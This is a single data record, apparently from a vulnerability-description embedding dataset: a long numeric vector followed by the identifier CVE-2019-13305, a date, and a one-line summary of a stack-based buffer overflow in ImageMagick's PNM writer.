0.019991228356957436, 0.007115086540579796, -0.00818290002644062, 0.010758861899375916, 0.021194811910390854, 0.014443001709878445, 0.012725693173706532, -0.026420123875141144, 0.019345402717590332, 0.010303848423063755, 0.003214448457583785, 0.009327772073447704, -0.0015466781333088875, 0.003548369510099292, 0.003201605286449194, -0.016042886301875114, 0.004550132434815168, -0.0051409159786999226, -0.01966831460595131, 0.009709395468235016, -0.007992087863385677, 0.021429656073451042, 0.0005972048966214061, -0.016277732327580452, -0.010435949079692364, -0.015910785645246506, 0.007008671760559082, -0.013026589527726173, -0.033465489745140076, 0.0028640148229897022, -0.017231792211532593, 0.008146204985678196, -0.000605002511292696, -0.015822719782590866, -0.015998853370547295, 0.005742707755416632, -0.0002956210228148848, 0.0163511224091053, -0.018949100747704506, -0.017686806619167328, -0.005977553315460682, -0.0012861463474109769, -0.010472644120454788, -0.0348745658993721, -0.007793936878442764, 0.004076771903783083, -0.011250569485127926, 0.0225745290517807, -0.007283881772309542, -0.0028456675354391336, -0.015250283293426037, 0.0031153729651123285, 0.03825046867132187, -0.00020801261416636407, -0.008623234927654266, -0.011837683618068695, 0.0002003296831389889, 0.006814190652221441, 0.005034501664340496, -0.005324388854205608, -0.015573196113109589, 0.007962731644511223, 0.004216211382299662, 0.013973310589790344, 0.005772063508629799, -0.033289358019828796, 0.007918698713183403, -0.0004694617528002709, 0.013621042482554913, 0.008711302652955055, -0.011199197731912136, -0.003992374520748854, -0.001499892445281148, -0.014479695819318295, 0.012043173424899578, 0.002339281840249896, 0.008087493479251862, 0.016674034297466278, 0.007408643141388893, 0.0030383144039660692, -0.006249093450605869, 0.03569652512669563, -0.005118899047374725, -0.015690619125962257, -0.015191571786999702, -0.010898301377892494, 0.01079555694013834, -0.015353027731180191, -0.01767212711274624, 0.024262480437755585, -0.02471749484539032, 0.009856174699962139, 0.022471783682703972, 0.02276534028351307, 0.003100695088505745, 0.015617229044437408, -0.004062094260007143, 0.018758287653326988, -0.009129621088504791, 0.007926037535071373, 0.0031832579988986254, 0.019800415262579918, -0.024086346849799156, 0.004238228313624859, 0.015411739237606525, 0.02584768831729889, 0.012476170435547829, 0.007537074387073517, -0.006667411886155605, -0.018787644803524017, 0.006039934232831001, 0.0029594209045171738, -0.01497874315828085, 0.00510789081454277, 0.0025906399823725224, 0.0019429799867793918, -0.016747424378991127, 0.016219021752476692, 0.010927657596766949, -0.023073576390743256, -0.03094090148806572, 0.00924704410135746, -0.014531068503856659, -0.014457679353654385, -0.010098358616232872, -0.004759292118251324, 0.02574494294822216, 0.0014778757467865944, 0.00973875168710947, -0.017965685576200485, -0.002618161030113697, -0.021928703412413597, -0.0031594065949320793, -0.011140486225485802, 0.0002940156264230609, -0.019976550713181496, 0.0006201390642672777, -0.0056619793176651, 0.014721880666911602, -0.012586253695189953, 0.004773969762027264, -0.03672397509217262, -0.015617229044437408, 0.01083225104957819, -0.00929841585457325, 0.0023411165457218885, -0.003649279708042741, -0.011602838523685932, -0.003509840229526162, 0.005386769771575928, -0.009812140837311745, 0.006781165488064289, 0.01129460334777832, 0.016791457310318947, 0.002840163419023156, -0.008557184599339962, 0.012263340875506401, -0.022236937656998634, -0.0003323156270198524, 0.01023045927286148, 0.0030236365273594856, 0.02352858893573284, 0.005768394097685814, -0.03566716983914375, 0.011177180334925652, -0.004421701654791832, 0.003568551503121853, 0.006795843131840229, -0.007955392822623253, -0.017275825142860413, -0.003379574278369546, 0.013540313579142094, -0.011221214197576046, 0.0012164266081526875, -0.02063705213367939, 0.005559234414249659, 0.0057206908240914345, 0.024203769862651825, 0.02385150082409382, 0.003269490320235491, -0.00002915502045652829, -0.003996043931692839, 0.0057243602350354195, -0.008586540818214417, -0.017246469855308533, -0.009423177689313889, 0.038485314697027206, 0.0016558446222916245, 0.00037543181679211557, -0.0008646169444546103, 0.00002187343307014089, 0.010083680972456932, -0.005067526828497648, 0.00879936944693327, -0.029502471908926964, 0.01633644290268421, -0.0017723500495776534, -0.0035630473867058754, -0.02562752179801464, 0.017730839550495148, 0.010531355626881123, -0.005907833576202393, -0.01869957707822323, -0.018229886889457703, -0.00868928525596857, -0.01652725599706173, 0.0023539597168564796, -0.0037043215706944466, -0.010179086588323116, 0.01126524806022644, -0.0005981222493574023, -0.0010558876674622297, 0.006568336393684149, -0.024027636274695396, -0.0036676269955933094, -0.017011623829603195, -0.022398395463824272, 0.016938235610723495, 0.03205641731619835, -0.02258920669555664, -0.0020218733698129654, 0.0037006521597504616, -0.004307948052883148, -0.02992813102900982, 0.008168221451342106, -0.03411131724715233, 0.03508005291223526, -0.016057563945651054, -0.013877904042601585, 0.003577725263312459, 0.029223592951893806, -0.000605002511292696, -0.014303562231361866, 0.004843689501285553, 0.010905640199780464, -0.022985508665442467, -0.009944241493940353, -0.019154589623212814, -0.008498473092913628, -0.008858080953359604, 0.0036676269955933094, 0.01081757340580225, -0.005973883904516697, 0.013173367828130722, 0.008586540818214417, -0.0049390955828130245, -0.009195671416819096, -0.04315286874771118, -0.0067004370503127575, -0.0033979215659201145, 0.01395129319280386, 0.022031448781490326, 0.017011623829603195, -0.009349788539111614, 0.0009164480725303292, -0.012747710570693016, -0.019301369786262512, 0.004755622241646051, -0.021370945498347282, 0.008138866163790226, 0.013657736591994762, 0.004135483410209417, -0.004972120746970177, 0.011500093154609203, 0.027491606771945953, 0.004513437859714031, 0.016321765258908272, -0.0007889342959970236, -0.013349502347409725, -0.00718847569078207, -0.00972407404333353, -0.00258880527690053, 0.018758287653326988, -0.013158690184354782, 0.003109868848696351, -0.019844450056552887, -0.027476929128170013, 0.004047416150569916, -0.005900494288653135, -0.005273016635328531, -0.009569955989718437, -0.018905067816376686, -0.006399541161954403, -0.017686806619167328, -0.023102931678295135, 0.016116276383399963, 0.0002145488397218287, -0.00048207552754320204, 0.0012494517723098397, -0.002150304615497589, -0.032349973917007446, -0.01649790070950985, -0.002460374031215906, -0.0004917078767903149, -0.0026566903106868267, -0.010069003328680992, 0.0016026374651119113, 0.005628954153507948, -0.004282261710613966, 0.008116849698126316, 0.03789820149540901, 0.0034914929419755936, 0.013877904042601585, -0.021224167197942734, -0.035373613238334656, 0.0021613130811601877, -0.013085301034152508, 0.004337303806096315, 0.00877735298126936, -0.022868085652589798, 0.0021062709856778383, -0.012953200377523899, -0.026126567274332047, 0.007038027513772249, -0.00039309108979068696, 0.0057023437693715096, -0.006810521241277456, -0.002706228056922555, -0.0004614348290488124, 0.01131661981344223, 0.0023668028879910707, -0.0064729307778179646, -0.0038089014124125242, -0.01869957707822323, -0.038514669984579086, 0.021018676459789276, 0.0068435464054346085, 0.0007141690002754331, -0.0353148989379406, -0.00231543043628335, 0.011382670141756535, 0.0034272773191332817, 0.02276534028351307, -0.00696096895262599, 0.005962875206023455, -0.011199197731912136, -0.009180993773043156, 0.004891392309218645, -0.0016485056839883327, 0.027418218553066254, 0.04550132527947426, 0.0012191786663606763, -0.01843537576496601, -0.0009072744287550449, 0.008094832301139832, 0.011661549098789692, 0.005023492965847254, -0.00371899944730103, -0.00048620367306284606, 0.03317193314433098, 0.002396158641204238, 0.007074722088873386, 0.0066894288174808025, 0.004924417473375797, -0.010274493135511875, 0.0015145703218877316, 0.00976076815277338, 0.019360080361366272, -0.02151772379875183, 0.022104837000370026, 0.00032979287789203227, -0.009599312208592892, -0.01345224678516388, -0.02674303762614727, -0.019037168473005295, 0.0087920306250453, 0.00542713375762105, 0.0027337491046637297, -0.0006426144973374903, 0.0027539310976862907, 0.020314140245318413, 0.006241754628717899, 0.011610177345573902, -0.0021356267388910055, -0.023381810635328293, -0.013510958291590214, -0.0176574494689703, 0.0143622737377882, -0.0012191786663606763, 0.018978456035256386, -0.029267627745866776, 0.01761341653764248, -0.015353027731180191, -0.017936328426003456, -0.004087780602276325, 0.0024255141615867615, -0.029605217278003693, 0.005056518130004406, -0.006608700845390558, -0.028284210711717606, -0.01343023031949997, -0.01341555267572403, 0.0016668529715389013, -0.008630573749542236, -0.0012870637001469731, 0.0013503619702532887, 0.015954820439219475, -0.00371899944730103, -0.013775159604847431, -0.004018060863018036, -0.03094090148806572, 0.002254884224385023, -0.0269191712141037, -0.0069022574461996555, 0.024952340871095657, -0.026053179055452347, -0.00877735298126936, -0.003471310716122389, 0.0007192144985310733, 0.015103504993021488, 0.010883623734116554, 0.0061316704377532005, -0.00588948605582118, -0.004968451336026192, 0.012153257615864277, 0.004751952830702066, -0.022824052721261978, -0.021370945498347282, 0.008153543807566166, 0.002453035209327936, -0.037663355469703674, 0.019727027043700218, -0.014663169160485268, -0.012644965201616287, -0.007287551183253527, -0.00882138591259718, -0.010281831957399845, -0.004825342446565628, -0.020005906000733376, -0.004425371065735817, 0.004917078651487827, -0.011823005974292755, 0.019169269129633904, 0.0021026015747338533, -0.0018549129599705338, -0.015675941482186317, -0.011522109620273113, -0.02352858893573284, 0.01646854355931282, -0.0076178028248250484, 0.008623234927654266, -0.0017007954884320498, 0.005324388854205608, -0.012094546109437943, 0.004854697734117508, -0.006183043122291565, 0.0015760337701067328, -0.021238844841718674, -0.01343756914138794, -0.0014375116443261504, -0.018288597464561462, -0.003335540648549795, -0.012197290547192097, 0.030706055462360382, 0.015367706306278706, -0.009041553363204002, 0.026317380368709564, 0.004223550669848919, -0.03698817640542984, -0.012681660242378712, 0.0029942807741463184, -0.004443718120455742, -0.015176894143223763, 0.011030402034521103, -0.014281544834375381, -0.015338350087404251, -0.018817000091075897, 0.000911402574274689, -0.0055078621953725815, -0.02870986796915531, -0.023102931678295135, -0.014083393849432468, -0.003588733496144414, -0.022809375077486038, 0.0026034831535071135, -0.022090159356594086, 0.03370033577084541, -0.0014136601239442825, 0.00974609050899744, 0.00013955422036815435, 0.011375331319868565, -0.0013503619702532887, -0.0038896293845027685, 0.019213302060961723, -0.001435676938854158, 0.017818905413150787, 0.0012439475394785404, -0.02487895078957081, -0.031175747513771057, 0.025245897471904755, 0.0033226977102458477, 0.015118182636797428, -0.013099978677928448, 0.003944671247154474, 0.010010291822254658, -0.005687665659934282, -0.0006696767522953451, 0.013099978677928448, -0.009980935603380203, -0.02273598499596119, -0.009166315197944641, 0.005621615331619978, 0.020901253446936607, -0.008373712189495564, -0.0029355695005506277, 0.0051409159786999226, 0.0004274922830518335, -0.04511970281600952, 0.0022126855328679085, 0.000302501255646348, 0.027491606771945953, -0.012204629369080067, -0.014134766533970833, -0.014743897132575512, -0.01502277608960867, 0.030500566586852074, 0.01842069812119007, -0.0047446140088140965, -0.03414067253470421, -0.009643345139920712, 0.0060766288079321384, -0.007096739020198584, -0.004058424849063158, -0.010105697438120842, 0.02457071654498577, 0.003408930031582713, -0.004131813999265432, 0.006183043122291565, 0.012967878021299839, -0.005408786702901125, 0.01437695138156414, 0.005845452658832073, 0.005096882581710815, -0.005049179308116436, 0.00973875168710947, 0.01749599352478981, -0.021062711253762245, 0.018185852095484734, -0.005819766316562891, -0.009826818481087685, -0.013019250705838203, -0.004051085561513901, -0.0006109653622843325, -0.004590496886521578, 0.006634386721998453, -0.015338350087404251, -0.006542650517076254, -0.008263627998530865, -0.008403067477047443, 0.024497326463460922, -0.01862618699669838, 0.002553945407271385, -0.01745196059346199, 0.005489514674991369, 0.006770156789571047, -0.015103504993021488, 0.007184806279838085, -0.00371899944730103, -0.018215207383036613, -0.003386913100257516, 0.021914025768637657, -0.010406593792140484, -0.0175840612500906, -0.021194811910390854, -0.01346692442893982, -0.021048033609986305, -0.017202436923980713, -0.03320128843188286, 0.02664029225707054, -0.011727599427103996, -0.011419365182518959, -0.010619422420859337, 0.009481889195740223, 0.0004641869163606316, 0.009349788539111614, -0.041597019881010056, -0.003874951507896185, -0.003506170818582177, -0.008557184599339962, 0.026317380368709564, 0.007283881772309542, 0.012688999064266682, 0.005904164165258408, -0.011390008963644505, -0.02873922511935234, 0.009063570760190487, -0.016204342246055603, -0.003271325258538127, 0.007360940333455801, -0.022339683026075363, -0.025333963334560394, -0.004238228313624859, -0.0029649250209331512, -0.025392675772309303, 0.0053060417994856834, -0.02053430862724781, -0.030236365273594856, 0.002416340634226799, -0.009496566839516163, 0.0012549558887258172, -0.0016154805198311806, -0.016233699396252632, -0.00374285108409822, 0.0019466495141386986, 0.02562752179801464, 0.010656116530299187, -0.009907546453177929, 0.017686806619167328, 0.005250999704003334, 0.01563190668821335, -0.011470737867057323, -0.021106744185090065, 0.003375904867425561, 0.01348160207271576, -0.002790625672787428, -0.000013330466572369915, -0.01636580005288124, -0.006340830121189356, -0.024130379781126976, 0.013532974757254124, 0.020299462601542473, 0.015749329701066017, -0.010032308287918568, 0.024541359394788742, -0.024512004107236862, 0.00487304525449872, 0.0008880097302608192, -0.00083893071860075, 0.002508077071979642, -0.01239544153213501, -0.007786598056554794, -0.0005394108593463898, -0.005819766316562891, -0.014090733602643013, 0.013811853714287281, 0.019741704687476158, -0.00974609050899744, -0.007786598056554794, -0.017011623829603195, -0.0005650970852002501, -0.005173941142857075, -0.009922225028276443, -0.007779258769005537, 0.009041553363204002, 0.0309702567756176, 0.0025722926948219538, -0.009848834946751595, -0.02377811260521412, 0.016674034297466278, 0.00255761481821537, -0.019360080361366272, 0.005273016635328531, 0.009335110895335674, 0.002979602897539735, 0.01176429446786642, -0.01849408820271492, -0.0017530854092910886, 0.017877617850899696, 0.0032327957451343536, 0.019272012636065483, -0.0008655342971906066, 0.008116849698126316, 0.011991800740361214, 0.002770443679764867, -0.009026875719428062, -0.009569955989718437, -0.005526209250092506, -0.017217114567756653, -0.0034584677778184414, -0.006982985883951187, -0.008601218461990356, 0.00881404709070921, -0.0008921378757804632, 0.010083680972456932, 0.0032364653889089823, 0.045824237167835236, 0.011610177345573902, -0.00048207552754320204, 0.0018173009157180786, 0.016130954027175903, 0.017995040863752365, 0.008601218461990356, 0.018831677734851837, 0.009364466182887554, 0.025055084377527237, 0.02145901322364807, 0.008997520431876183, -0.010391916148364544, -0.0059115029871463776, -0.025011051446199417, -0.00618671253323555, -0.01767212711274624, 0.012241324409842491, 0.006781165488064289, 0.008373712189495564, 0.00664906483143568, -0.006982985883951187, -0.0016558446222916245, -0.0024823909625411034, -0.003412599442526698, -0.002814477076753974, -0.005375761538743973, -0.017921650782227516, -0.005999569781124592, -0.013026589527726173, 0.020842542871832848, -0.012028495781123638, -0.007353601511567831, -0.0015659427735954523, -0.006828868295997381, -0.011030402034521103, 0.0092617217451334, -0.003443789901211858, -0.006443575024604797, 0.011111130006611347, -0.0074673546478152275, 0.028416311368346214, 0.010773539543151855, 0.02997216396033764, -0.008770013228058815, 0.00565464049577713, -0.006230745930224657, 0.00439601531252265, -0.011654210276901722, 0.00308968685567379, -0.01187437865883112, 0.0035538736265152693, 0.002908048452809453, -0.018200529739260674, -0.009012198075652122, 0.019213302060961723, 0.0003504336054902524, -0.009100264869630337, -0.00009919013973558322, 0.001121020526625216, -0.0032970113679766655, 0.020138006657361984, 0.024996373802423477, 0.003443789901211858, 0.0021117753349244595, -0.011500093154609203, 0.009863513521850109, -0.009393822401762009, -0.021444333717226982, -0.010120375081896782, -0.02887132577598095, -0.015176894143223763, 0.007511388044804335, -0.00440335413441062, -0.023440521210432053, -0.0031080341432243586, 0.01733453758060932, 0.0003201605286449194, 0.009709395468235016, -0.023279065266251564, 0.004190525505691767, 0.010017630644142628, -0.012043173424899578, -0.002504407661035657, -0.024247802793979645, 0.011345976032316685, -0.0005398695357143879, 0.00671878457069397, 0.004495090804994106, 0.009995614178478718, -0.025480741634964943, 0.011015724390745163, 0.016072243452072144, 0.016894202679395676, -0.013628381304442883, 0.02062237448990345, 0.027021916583180428, -0.0009604816441424191, -0.010399254970252514, -0.014237511903047562, -0.006102314684540033, -0.0045831575989723206, 0.0006508707883767784, 0.01639515534043312, 0.008615896105766296, -0.007632480468600988, -0.007581107784062624, -0.00870396289974451, -0.019066523760557175, -0.006094975862652063, 0.004234558902680874, 0.00595920579507947, -0.01328345201909542, 0.0023301083128899336, -0.006447244435548782, -0.018846355378627777, 0.0057170214131474495, -0.020270107313990593, 0.02159111388027668, -0.012622948735952377, -0.0012448648922145367, -0.003915315493941307, 0.011103791184723377, -0.0002209703961852938, -0.01872893236577511, -0.009643345139920712, 0.006883910391479731, 0.025994466617703438, 0.009225026704370975, -0.008623234927654266, -0.01037723757326603, -0.0019283021101728082, 0.01191841159015894, 0.011808328330516815, -0.005295033100992441, -0.010883623734116554, -0.013276112265884876, -0.004267584066838026, 0.004546463023871183, -0.006403210572898388, 0.022280972450971603, 0.013099978677928448, -0.0037410163786262274, -0.018200529739260674, -0.02882729098200798, -0.00347681506536901, 0.019022488966584206, -0.030353788286447525, -0.022486461326479912, -0.013188045471906662, -0.03202706202864647, 0.007071052677929401, -0.009628667496144772, -0.0029869419522583485, 0.00333187123760581, 0.012652304023504257, -0.009012198075652122, -0.01874361000955105, -0.0014494373463094234, 0.00883606355637312, 0.008498473092913628, -0.005074865650385618, -0.031410593539476395, -0.003262151498347521, 0.02972264029085636, -0.004443718120455742, 0.00149163615424186, -0.02790258638560772, 0.01192575041204691, -0.005614276509732008, -0.0031043647322803736, -0.004660216625779867, -0.003084182506427169, -0.04200799763202667, 0.010024969466030598, 0.0016503403894603252, 0.0012604601215571165, 0.002423679456114769, -0.006006909068673849, 0.0034309467300772667, 0.011463398113846779, 0.0235872995108366, -0.00868928525596857, 0.01955089159309864, -0.02051963098347187, -0.010751523077487946, 0.006197720766067505, 0.012285358272492886, -0.003161241300404072, -0.03736979886889458, 0.002141130855306983, 0.0025264243595302105, 0.0018842685967683792, 0.015705296769738197, 0.009672701358795166, 0.000754074368160218, 0.0003976779116783291, -0.025143152102828026, -0.016204342246055603, -0.003911646082997322, -0.008094832301139832, -0.010457966476678848, 0.015998853370547295, 0.0009990109829232097, -0.007815953344106674, 0.006832537706941366, -0.001016440917737782, -0.01193308923393488, -0.01344490796327591, 0.028988748788833618, -0.017877617850899696, -0.006109653972089291, 0.0034823191817849874, 0.015250283293426037, -0.0087920306250453, -0.00976076815277338, -0.006395871751010418, 0.007918698713183403, 0.0015264961402863264, -0.02182595804333687, -0.0022567189298570156, -0.021150777116417885, 0.010626761242747307, -0.01742260530591011, 0.0204022079706192, -0.004429040476679802, -0.003080513095483184, 0.001439346349798143, 0.009892868809401989, 0.006168365012854338, 0.015998853370547295, -0.0055041927844285965, -0.01083225104957819, 0.005625284742563963, 0.02984006330370903, -0.013782498426735401, 0.0027851215563714504, 0.004095119424164295, -0.015764007344841957, 0.007063713856041431, -0.0035795599687844515, 0.032555464655160904, 0.023323098197579384, -0.009870852343738079, -0.009973596781492233, 0.007537074387073517, 0.007030688691884279, -0.002999784890562296, 0.009680040180683136, 0.021253522485494614, 0.0173638928681612, -0.01655661128461361, 0.003186927642673254, -0.007698530796915293, -0.008403067477047443, 0.01658596657216549, -0.0015641080681234598, -0.0031043647322803736, 0.004421701654791832, 0.008491134271025658, 0.02573026530444622, 0.012211969122290611, 0.0087920306250453, -0.006792173720896244, 0.03384711593389511, 0.009041553363204002, 0.0017127213068306446, -0.004399684723466635, -0.018097786232829094, -0.023000186309218407, 0.02878325805068016, -0.006836207117885351, 0.034522294998168945, 0.008102171123027802, 0.0055005233734846115, 0.006553658749908209, -0.014090733602643013, 0.005764724221080542, -0.00589682487770915, 0.003052992280572653, -0.015705296769738197, 0.001891607535071671, -0.00741598242893815, 0.0033483838196843863, 0.019316047430038452, 0.0026750375982373953, 0.002150304615497589, -0.005096882581710815, -0.006329821422696114, -0.006891249213367701, -0.006619709078222513, 0.017173081636428833, 0.008916792459785938, 0.01755470596253872, -0.012711015529930592, -0.014736558310687542, 0.0117936497554183, -0.029399728402495384, 0.006542650517076254, -0.015059471130371094, 0.02457071654498577, -0.007397634908556938, 0.0032401347998529673, -0.01730518229305744, 0.03599008172750473, -0.02669900469481945, -0.0064912778325378895, -0.005390439182519913, -0.015367706306278706, 0.012725693173706532, 0.01019376516342163, 0.005188618786633015, -0.010017630644142628, 0.0019356410484761, 0.005790410563349724, -0.0013843044871464372, 0.02674303762614727, 0.0019136243499815464, 0.010384576395154, 0.010406593792140484, 0.0037483552005141973, -0.0011100121773779392, 0.028445668518543243, 0.020226072520017624, -0.0037978929467499256, 0.012718354351818562, 0.002016369253396988, -0.023440521210432053, -0.002882362110540271, 0.0022842399775981903, -0.022941475734114647, 0.013136672787368298, 0.004718927666544914, 0.014244850724935532, 0.005775732919573784, -0.024203769862651825, 0.01761341653764248, 0.0175840612500906, -0.006410549860447645, -0.009195671416819096, -0.00168520025908947, -0.027051271870732307, 0.010582727380096912, 0.005287694279104471, 0.00664906483143568, 0.007030688691884279, -0.008043460547924042, -0.0019062854116782546, -0.0018787644803524017, -0.0014650325756520033, 0.006814190652221441, 0.008425083942711353, 0.015529162250459194, 0.04244833439588547, 0.008843403309583664, 0.005258338525891304, 0.0006898588035255671, -0.025245897471904755, -0.0176574494689703, 0.00013588475121650845, -0.01843537576496601, -0.0013136672787368298, 0.001205418142490089, -0.0013411883264780045, 0.0036804701667279005, 0.011118468828499317, -0.0033520532306283712, -0.004884053487330675, -0.01497874315828085, -0.004906070418655872, -0.008725980296730995, 0.012189951725304127, 0.006410549860447645, 0.002020038664340973, -0.005313380621373653, 0.006094975862652063, -0.007324245758354664, -0.01837666518986225, 0.023235032334923744, 0.012945861555635929, 0.007390296086668968, 0.01846473105251789, -0.002306256676092744, 0.008924131281673908, 0.0005715186707675457, 0.002520920243114233, -0.010501999408006668, -0.016835490241646767, 0.006109653972089291, 0.008425083942711353, 0.019286690279841423, 0.019037168473005295, -0.021414978429675102, -0.038808226585388184, 0.0033942521549761295, 0.02044624090194702, -0.00034194797626696527, 0.003830918110907078, 0.012087207287549973, -0.02462942712008953, 0.01285045500844717, -0.009650684893131256, 0.011199197731912136, 0.005834444426000118, 0.013701770454645157, -0.007529735565185547, 0.006909596733748913, 0.007588447071611881, 0.02661093696951866, 0.012109223753213882, -0.011177180334925652, -0.002612656680867076, -0.014780592173337936, 0.009907546453177929, -0.024071669206023216, 0.009892868809401989, 0.00641421927139163, -0.002698889235034585, 0.023880857974290848, 0.007786598056554794, -0.0038712820969522, 0.008168221451342106, -0.013011910952627659, -0.006120662204921246, 0.021165454760193825, 0.022501138970255852, -0.004186856094747782, 0.01837666518986225, 0.00976810697466135, -0.01082491222769022, -0.02471749484539032, 0.02696320414543152, -0.0009393822401762009, 0.00149163615424186, 0.011367992497980595, -0.0008765427046455443, 0.015367706306278706, -0.008432422764599323, -0.007808614522218704, -0.0005467497976496816, -0.01566126197576523, -0.01751067116856575, -0.01636580005288124, -0.03522683307528496, -0.007757242303341627, 0.010164408944547176, 0.004806994926184416, 0.010524016804993153, -0.0287245474755764, -0.0032291263341903687, -0.003130050841718912, 0.005621615331619978, 0.010435949079692364, -0.004249236546456814, 0.005606937687844038, 0.023205677047371864, -0.02574494294822216, 0.0009513079421594739, 0.019829770550131798, 0.0064912778325378895, 0.006392202340066433, 0.003366731107234955, -0.01652725599706173, 0.018185852095484734, 0.004120805766433477, 0.00830766186118126, 0.00415383093059063, 0.005768394097685814, 0.02578897774219513, 0.016791457310318947, -0.011037740856409073, 0.01751067116856575, 0.00058069231454283, -0.007243517320603132, -0.012498186901211739, 0.0014613631647080183, 0.011250569485127926, 0.0023246039636433125, 0.009364466182887554, -0.02059301920235157, 0.0037171647418290377, 0.00333187123760581, -0.013745803385972977, 0.01566126197576523, -0.006880240980535746, 0.0009568121749907732, 0.00048207552754320204, 0.017848262563347816, 0.0019851787947118282, 0.0175840612500906, -0.002642012434080243, 0.006014247890561819, -0.0017723500495776534, 0.011228553019464016, 0.0011402852833271027, -0.008747996762394905, 0.0017622590530663729, -0.0055115316063165665, 0.0029777681920677423, -0.022809375077486038, -0.019139911979436874, -0.01328345201909542, 0.002053063828498125, 0.018934423103928566, -0.015353027731180191, -0.004139152821153402, 0.007852648384869099, -0.009004859253764153, -0.005570243112742901, 0.012982555665075779, 0.011661549098789692, -0.016057563945651054, -0.004212541971355677, 0.014252189546823502, 0.012784404680132866, 0.009995614178478718, 0.033494848757982254, -0.02145901322364807, -0.01441364549100399, -0.021297555416822433, -0.006443575024604797, 0.007940715178847313, -0.00037130367127247155, -0.009026875719428062, 0.0016044721705839038, -0.02489362843334675, -0.01956556923687458, 0.00005154446989763528, 0.0067004370503127575, -0.017275825142860413, 0.023308420553803444, -0.0051519242115318775, -0.020079294219613075, -0.0012210133718326688, -0.004641869105398655, 0.0011201031738892198, 0.023455198854207993, -0.003911646082997322, -0.0047409445978701115, 0.011059757322072983, -0.0030144627671688795, 0.0010421271435916424, 0.05034501478075981, 0.0035997419618070126, 0.03182157129049301, 0.009122282266616821, 0.0038859599735587835, 0.016835490241646767, -0.018802322447299957, -0.006839876528829336, -0.01496406551450491, -0.010501999408006668, 0.015852075070142746, 0.008960825391113758, 0.01390726026147604, 0.005581251345574856, -0.004667555447667837, 0.010692811571061611, -0.006799512542784214, 0.007632480468600988, 0.0009306672145612538, -0.01640983298420906, -0.005999569781124592, -0.014288883656263351, 0.017833584919571877, -0.014039360918104649, -0.009966257959604263, -0.006645395420491695, 0.00976810697466135, -0.015044793486595154, 0.003274994669482112, 0.03698817640542984, 0.02486427314579487, 0.0008412241004407406, -0.014164122752845287, 0.008432422764599323, 0.023352455347776413, 0.0030548269860446453, 0.025422031059861183, 0.015294316224753857, 0.012490848079323769, -0.014809947460889816, -0.004451056942343712, 0.016174986958503723, -0.0030236365273594856, 0.00928373821079731, 0.004344642627984285, 0.009041553363204002, -0.00674080103635788, 0.0010531354928389192, 0.0061353398486971855, -0.0019760052673518658, 0.008153543807566166, 0.005474837031215429, -0.0055152010172605515, 0.02581833302974701, 0.014802608639001846, 0.0013622876722365618, -0.004634530283510685, -0.006340830121189356, 0.005438142456114292, -0.022295650094747543, -0.005284024868160486, -0.004252905957400799, -0.010780878365039825, -0.008968164213001728, -0.027183372527360916, -0.019360080361366272, 0.0032603167928755283, 0.007779258769005537, -0.03795691207051277, 0.02150304615497589, -0.0033337059430778027, -0.0027961297892034054, -0.006828868295997381, -0.006348168943077326, -0.005496853496879339, -0.01177897211164236, 0.01036255992949009, -0.0005008815205655992, 0.006751809734851122, 0.007111417129635811, -0.005232652649283409, -0.011074435897171497, 0.012468830682337284, -0.0051482548005878925, 0.0008320504566654563, -0.008872758597135544, -0.022369038313627243, 0.005350075196474791, -0.012065189890563488, 0.015250283293426037, 0.006538980640470982, 0.0027282447554171085, -0.01081757340580225, -0.022119514644145966, 0.04083377122879028, -0.004080441314727068, 0.00166226620785892, -0.014516390860080719, -0.0017209775978699327, 0.016174986958503723, 0.022868085652589798, -0.0010100193321704865, -0.029003426432609558, 0.0064876084215939045, 0.013386196456849575, 0.0015017272671684623, 0.0064839390106499195, -0.016057563945651054, -0.012197290547192097, 0.0072618648409843445, 0.02482024021446705, -0.007118755951523781, -0.020974643528461456, 0.005096882581710815, 0.019345402717590332, -0.0031117035541683435, 0.004961112514138222, -0.012637626379728317, 0.023205677047371864, 0.004704250022768974, -0.01500075962394476, 0.0092617217451334, 0.027021916583180428, 0.014809947460889816, 0.003702486865222454, -0.0023447859566658735, -0.009225026704370975, 0.015719974413514137, 0.004671224858611822, -0.001908120117150247, 0.004003382753580809, -0.005691335070878267, 0.03396453708410263, 0.015220927074551582, -0.001754920114763081, 0.009041553363204002, -0.009569955989718437, 0.0045244465582072735, 0.0053023723885416985, 0.018229886889457703, 0.007111417129635811, 0.052957672625780106, -0.005746377166360617, 0.015543839894235134, -0.011228553019464016, 0.0057170214131474495, -0.000483910262119025, 0.022016771137714386, 0.0005251917173154652, -0.010714828036725521, 0.014567763544619083, 0.02787323109805584, 0.013577008619904518, -0.0031795885879546404, 0.0001867985411081463, 0.005904164165258408, 0.029443761333823204, 0.02065173164010048, 0.0025227549485862255, 0.0062784492038190365, -0.001060474431142211, 0.003379574278369546, 0.0018576650181785226, 0.01393661554902792, -0.005408786702901125, -0.004238228313624859, 0.0012109223753213882, -0.028122754767537117, 0.021209489554166794, -0.0034070953261107206, -0.024467971175909042, -0.024042313918471336, 0.0017154733650386333, 0.01020844280719757, 0.005676657427102327, 0.0029979501850903034, 0.011235891841351986, -0.028577767312526703, 0.022075481712818146, 0.012131240218877792, 0.026170602068305016, 0.017774872481822968, -0.03634234890341759, 0.019301369786262512, 0.036459773778915405, -0.0039703575894236565, -0.0031630760058760643, -0.009180993773043156, 0.007698530796915293, 0.008535168133676052, -0.0020915931090712547, -0.017217114567756653, 0.01867022179067135, 0.000017644950276007876, -0.01645386591553688, 0.03593137115240097, 0.025407353416085243, -0.007933376356959343, 0.05049179494380951, -0.006326152011752129, 0.007353601511567831, -0.02680174820125103, -0.01023045927286148, 0.01191841159015894 ]
3,601
CVE-2019-13305
2019-07-05T01:15:10.563000
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error.
